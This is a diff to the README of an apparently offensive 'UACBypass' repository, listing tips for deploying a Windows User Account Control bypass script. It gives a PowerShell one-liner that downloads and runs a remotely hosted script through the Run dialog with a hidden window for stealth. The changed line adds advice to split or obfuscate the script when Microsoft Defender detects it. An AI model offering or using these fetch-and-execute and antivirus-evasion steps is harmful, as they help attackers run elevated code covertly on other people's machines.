CousTov/UACBypass/README.md

 ### Tips:
 1. Host your modified script online.
 2. Utilize Run Dialague Box (Win + R) to execute powershell -C "irm 'LinkToThisScript' | iex" and the "-WindowStyle Hidden" flag for stealth
-3. Split the script if Defender is triggered.
+3. Split the script / obfuscate if Defender is triggered.